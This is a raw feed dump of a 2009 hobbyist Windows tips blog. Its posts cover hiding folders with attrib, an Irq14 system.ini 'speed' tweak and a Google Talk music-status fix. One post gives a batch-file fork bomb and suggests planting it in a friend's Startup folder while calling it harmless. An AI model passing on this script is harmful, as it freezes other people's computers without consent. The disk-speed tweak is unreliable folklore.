div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} p 	{mso-margin-top-alt:auto; 	margin-right:0in; 	mso-margin-bottom-alt:auto; 	margin-left:0in; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;p&gt;hide ur folders without the usage of folder lock :&lt;br /&gt;&lt;br /&gt;suppose u want to hide a folder named "hello"which is in D: of ur computer&lt;br /&gt;&lt;br /&gt;go to command prompt&lt;br /&gt;start---&gt;run---&gt;cmd--&gt;d:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;after changing it from C: to D:&lt;br /&gt;&lt;br /&gt;type D:/&gt;attrib +h +s hello&lt;br /&gt;the above command is to hide the folder&lt;br /&gt;&lt;br /&gt;to show the folder&lt;br /&gt;&lt;br /&gt;tyoe D:/&gt;attrib -h -s abc&lt;br /&gt;&lt;br /&gt;in this type of hidding the folder cannot be viewed even if we make advance search or even changing the folders menu to (show all hidden files)&lt;/p&gt;  &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-4597918592250783429?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/4597918592250783429/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/05/hide-folders-in-windows.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/4597918592250783429'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/4597918592250783429'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/05/hide-folders-in-windows.html' title='HIDE FOLDERS IN WINDOWS'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-3445384352266010496</id><published>2009-05-29T05:25:00.001-07:00</published><updated>2009-05-29T05:28:20.115-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tricks n tips'/><title type='text'>INCREASE HARD DISK SPEED IN WINDOWS</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_T53992hHLOM/Sh_UU1nWxzI/AAAAAAAAALI/GwRCmyhYVw4/s1600-h/z_ibm_ultrastar36zx.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 364px; height: 400px;" src="http://3.bp.blogspot.com/_T53992hHLOM/Sh_UU1nWxzI/AAAAAAAAALI/GwRCmyhYVw4/s400/z_ibm_ultrastar36zx.jpg" alt="" id="BLOGGER_PHOTO_ID_5341221137539319602" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;p class="MsoNormal"&gt;If you like to increase/optimize your Hard Disk I/O - read/write speed without buying expensive software utilities to do that job or changing the HD, just follow next steps. With doing these steps you will increase Hard disk speed (depends of manufacture and specification, but its worth to try). The most speed improvement is visible with IDE drives; however there are reports that this tweak also does good for SCSI disks.&lt;br /&gt;&lt;br /&gt;In any case, it won't harm your system, so try it yourself and let me know what you find!&lt;br /&gt;&lt;br /&gt;Steps:&lt;br /&gt;&lt;br /&gt;1. Run SYSEDIT.EXE from the start &amp;amp; then Run command.&lt;br /&gt;2. Expand the system.ini file window.&lt;br /&gt;3. Scroll down almost to the end of the file untill you find a line called [386enh].&lt;br /&gt;4. Press Enter to make one blank line, and in that line type&lt;br /&gt;5. Irq14=4096 (note: This line IS CASE SENSITIVE)&lt;br /&gt;6. Click on the File menu, then choose Save.&lt;br /&gt;7. Close SYSEDIT and reboot your computer.&lt;br /&gt;8. Restart windows!&lt;br /&gt;&lt;br /&gt;The speed improvement will be noticed just after the system reboots, any system info. software can be used to check the improvement.&lt;/p&gt; &lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-3445384352266010496?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/3445384352266010496/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/05/increase-hard-disk-speed-in-windows.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/3445384352266010496'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/3445384352266010496'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/05/increase-hard-disk-speed-in-windows.html' title='INCREASE HARD DISK SPEED IN WINDOWS'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_T53992hHLOM/Sh_UU1nWxzI/AAAAAAAAALI/GwRCmyhYVw4/s72-c/z_ibm_ultrastar36zx.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-5850473584123109664</id><published>2009-05-27T06:01:00.000-07:00</published><updated>2009-05-27T06:08:06.423-07:00</updated><title type='text'>MUSIC TRACK NOT SHOWING IN GOOGLE TALK STATUS</title><content type='html'>&lt;br /&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} p 	{mso-margin-top-alt:auto; 	margin-right:0in; 	mso-margin-bottom-alt:auto; 	margin-left:0in; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;}  /* List Definitions */  @list l0 	{mso-list-id:1669207042; 	mso-list-template-ids:-1446901478;} @list l0:level1 	{mso-level-tab-stop:.5in; 	mso-level-number-position:left; 	text-indent:-.25in;} ol 	{margin-bottom:0in;} ul 	{margin-bottom:0in;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;p class="MsoNormal" style="margin-bottom: 12pt;"&gt;For those who were busy fighting the aliens while Google Talk added the cool feature to display your currently playing music track in the Google status, please be aware that you can simply do so just by changing the status to “Show current music track”.&lt;br /&gt;&lt;br /&gt;Now, it so happened that I eagerly tried the feature when it was launched, but Gtalk did not show the status with Windows Media Player 10, 11 or Winamp on my PC. &lt;/p&gt;  &lt;p class="MsoNormal" style="margin-bottom: 12pt;"&gt;&lt;br /&gt;On further research I discovered that Google Talk installs a plug-in in Windows Media Player which sends the current music track to Gtalk. Now if, for any reason, WMP detects some problem with a plug-in, it disables it. This was the problem in my case. So here is what I did to enable my Google Talk plug-in:&lt;/p&gt;&lt;p class="MsoNormal" style="margin-bottom: 12pt;"&gt;&lt;br /&gt;&lt;/p&gt;  &lt;ol start="1" type="1"&gt;&lt;li class="MsoNormal" style=""&gt;Ensure that you have the      latest Google Talk installed&lt;/li&gt;&lt;/ol&gt;  &lt;p class="MsoNormal" style="margin-left: 0.5in;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;ol start="2" type="1"&gt;&lt;li class="MsoNormal" style=""&gt;In Windows Media Player,      press Alt+T to access the tools menu&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_T53992hHLOM/Sh06YpgFr7I/AAAAAAAAAK4/-ED4FPCLdAE/s1600-h/menu.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 258px; height: 146px;" src="http://3.bp.blogspot.com/_T53992hHLOM/Sh06YpgFr7I/AAAAAAAAAK4/-ED4FPCLdAE/s400/menu.png" alt="" id="BLOGGER_PHOTO_ID_5340488928262991794" border="0" /&gt;&lt;/a&gt;&lt;/li&gt;&lt;/ol&gt;  &lt;p class="MsoNormal" style="margin-left: 0.5in;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;ol start="3" type="1"&gt;&lt;li class="MsoNormal" style=""&gt;Press ‘Options’ &lt;/li&gt;&lt;/ol&gt;  &lt;p class="MsoNormal" style="margin-left: 0.5in;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;ol start="4" type="1"&gt;&lt;li class="MsoNormal" style=""&gt;Click on the ‘Plug-ins’ tab&lt;/li&gt;&lt;/ol&gt;  &lt;p class="MsoNormal" style="margin-left: 0.5in;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;ol start="5" type="1"&gt;&lt;li class="MsoNormal" style=""&gt;On the left hand ‘Category’      pane, click on the ‘Background’ item&lt;/li&gt;&lt;/ol&gt;  &lt;p class="MsoNormal" style="margin-left: 0.5in;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;ol start="6" type="1"&gt;&lt;li class="MsoNormal" style=""&gt;On the right hand      ‘Background’ pane, click on the Google Talk plugin to check and enable it&lt;p class="MsoNormal" style="margin-bottom: 12pt;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_T53992hHLOM/Sh06p-dhv2I/AAAAAAAAALA/lvWFO1xhlrs/s1600-h/Windows+media+player.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 305px; height: 400px;" src="http://4.bp.blogspot.com/_T53992hHLOM/Sh06p-dhv2I/AAAAAAAAALA/lvWFO1xhlrs/s400/Windows+media+player.png" alt="" id="BLOGGER_PHOTO_ID_5340489225947168610" border="0" /&gt;&lt;/a&gt;&lt;/p&gt; &lt;/li&gt;&lt;/ol&gt;  &lt;p class="MsoNormal" style="margin-left: 0.5in;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;ol start="7" type="1"&gt;&lt;li class="MsoNormal" style=""&gt;Save changes and change the      status in Google Talk to “Show current music track”&lt;/li&gt;&lt;/ol&gt;  &lt;p&gt;&lt;br /&gt;This worked for me, hope it helps you too!&lt;br /&gt;&lt;br /&gt;Oh and by the way, Google’s fascination with collecting information in order to show us meaningful results found its way in GTalk too. Google has a service called Google Trends. If you wish, then Google can log what you listen too, and hence show meaningful trends such as the current most popular song etc. I have opted in :)&lt;br /&gt;&lt;br /&gt;Happy chitter chatting!&lt;/p&gt;  &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-5850473584123109664?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/5850473584123109664/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/05/music-track-not-showing-in-google-talk.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/5850473584123109664'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/5850473584123109664'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/05/music-track-not-showing-in-google-talk.html' title='MUSIC TRACK NOT SHOWING IN GOOGLE TALK STATUS'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_T53992hHLOM/Sh06YpgFr7I/AAAAAAAAAK4/-ED4FPCLdAE/s72-c/menu.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-8044283667085122930</id><published>2009-05-24T02:26:00.000-07:00</published><updated>2009-05-24T02:51:21.446-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tricks n tips'/><title type='text'>Fork Bomb</title><content type='html'>&lt;span class="Apple-style-span"  style=";font-size:12px;"&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 255, 255);"&gt;&lt;span class="Apple-style-span" style="font-weight: bold;"&gt;This is a prank, which will make a command run over and over until the computer cannot handle any more programs and the computer will freeze or shutdown.&lt;br /&gt;!!!!THIS IS HARMLESS AND WILL DO NO DAMAGE TO YOUR COMPUTER!!!!!&lt;br /&gt;&lt;br /&gt;To make this open note pad and type:&lt;br /&gt;&lt;br /&gt;@echo off&lt;br /&gt;:START&lt;br /&gt;start a.bat&lt;br /&gt;GOTO START&lt;br /&gt;&lt;br /&gt;The code above must be saved as a.bat and when the other person opens it nothing will appear but in the background it will keep opening its self until the computer freezes or shuts down.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style=";font-size:12px;"&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 255, 255);"&gt;&lt;span class="Apple-style-span" style="font-weight: bold;"&gt;You can try this on your friends by putting it in the Startup.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="color: rgb(255, 255, 255);  font-weight: bold;font-size:48px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style=" font-weight: bold; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 0, 0);"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;I tried this on my computer and it worked(obviosly didn't put it in my startup. I just ran it.) &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-8044283667085122930?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/8044283667085122930/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/05/fork-bomb.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/8044283667085122930'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/8044283667085122930'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/05/fork-bomb.html' title='Fork Bomb'/><author><name>Diptarka</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='26' height='32' src='http://4.bp.blogspot.com/_sDQgQHKoByA/SfLoqfe-MyI/AAAAAAAAAHU/1S5Rna2y29M/S220/Image032.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-9181839247279213968</id><published>2009-05-22T14:10:00.001-07:00</published><updated>2009-05-22T14:29:19.401-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='DOWNLOADS'/><title type='text'>HARD DISK MONITORING SOFTWARE</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_T53992hHLOM/ShcUwhqV4nI/AAAAAAAAAKw/H3YKt20WZG4/s1600-h/zzzzzzzzz.gif"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 180px; height: 200px;" src="http://1.bp.blogspot.com/_T53992hHLOM/ShcUwhqV4nI/AAAAAAAAAKw/H3YKt20WZG4/s400/zzzzzzzzz.gif" alt="" id="BLOGGER_PHOTO_ID_5338758707173253746" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;o:smarttagtype namespaceuri="urn:schemas-microsoft-com:office:smarttags" name="City"&gt;&lt;/o:smarttagtype&gt;&lt;o:smarttagtype namespaceuri="urn:schemas-microsoft-com:office:smarttags" name="PlaceType"&gt;&lt;/o:smarttagtype&gt;&lt;o:smarttagtype namespaceuri="urn:schemas-microsoft-com:office:smarttags" name="PlaceName"&gt;&lt;/o:smarttagtype&gt;&lt;o:smarttagtype namespaceuri="urn:schemas-microsoft-com:office:smarttags" name="place"&gt;&lt;/o:smarttagtype&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if !mso]&gt;&lt;object classid="clsid:38481807-CA0E-42D2-BF39-B33AF135CC4D" id="ieooui"&gt;&lt;/object&gt; &lt;style&gt; st1\:*{behavior:url(#ieooui) } &lt;/style&gt; &lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Font Definitions */  @font-face 	{font-family:Wingdings; 	panose-1:5 0 0 0 0 0 0 0 0 0; 	mso-font-charset:2; 	mso-generic-font-family:auto; 	mso-font-pitch:variable; 	mso-font-signature:0 268435456 0 0 -2147483648 0;}  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} h2 	{mso-margin-top-alt:auto; 	margin-right:0in; 	mso-margin-bottom-alt:auto; 	margin-left:0in; 	mso-pagination:widow-orphan; 	mso-outline-level:2; 	font-size:18.0pt; 	font-family:"Times New Roman"; 	font-weight:bold;} p 	{mso-margin-top-alt:auto; 	margin-right:0in; 	mso-margin-bottom-alt:auto; 	margin-left:0in; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} span.productname 	{mso-style-name:product_name;} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;}  /* List Definitions */  @list l0 	{mso-list-id:621115952; 	mso-list-template-ids:928019508;} @list l0:level1 	{mso-level-number-format:bullet; 	mso-level-text:; 	mso-level-tab-stop:.5in; 	mso-level-number-position:left; 	text-indent:-.25in; 	mso-ansi-font-size:10.0pt; 	font-family:Symbol;} @list l1 	{mso-list-id:889459385; 	mso-list-template-ids:-420944506;} @list l1:level1 	{mso-level-number-format:bullet; 	mso-level-text:; 	mso-level-tab-stop:.5in; 	mso-level-number-position:left; 	text-indent:-.25in; 	mso-ansi-font-size:10.0pt; 	font-family:Symbol;} ol 	{margin-bottom:0in;} ul 	{margin-bottom:0in;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;p&gt;&lt;span class="productname"&gt;&lt;span style="font-size:130%;"&gt;Do you know how long your hard disk is going to last before u encounter a fatal Blue screen of death ?&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span class="productname"&gt;&lt;span style="font-size:130%;"&gt;Do you no what is the temperature of &lt;st1:city st="on"&gt;&lt;st1:place st="on"&gt;ur&lt;/st1:place&gt;&lt;/st1:city&gt; hard disk when u play cpu intensive games?&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span class="productname"&gt;&lt;span style="font-size:130%;"&gt; &lt;span style="font-size:100%;"&gt;The answer to all these question might be no&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size:100%;"&gt;  &lt;/span&gt;&lt;span style="font-size:100%;"&gt;but after you go through this post it will be replaced by a YES .I stumbled upon this amazing softwares last night n believe me it works whats more it’s a freebie .its called active hard disk monitor&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span class="productname"&gt;Active@ Hard Disk Monitor&lt;/span&gt; is a disk utility that checks and monitors the status of your hard drives to help prevent data loss. The system is based on the Self-Monitoring Analysis and Reporting Technology (S.M.A.R.T.).&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p&gt;This software monitors hard disk parameters such as Temperature, Head Flying Height and Spin-Up Time and notifies a user when a critical condition occurs. Disk Monitor also displays hard disk information, current S.M.A.R.T. attributes and the overall status of the hard disk's health.&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p&gt;Advanced disk scan allows you to detect bad sectors on a disk surface. The software can be launched automatically at Windows startup and monitor the system in the background. An icon in the System Tray can display the temperature for selected HDDs.&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;&lt;span style="font-size:130%;"&gt;Hardware Requirements:&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;  &lt;ul type="disc"&gt;&lt;li class="MsoNormal" style=""&gt;CPU: Pentium III 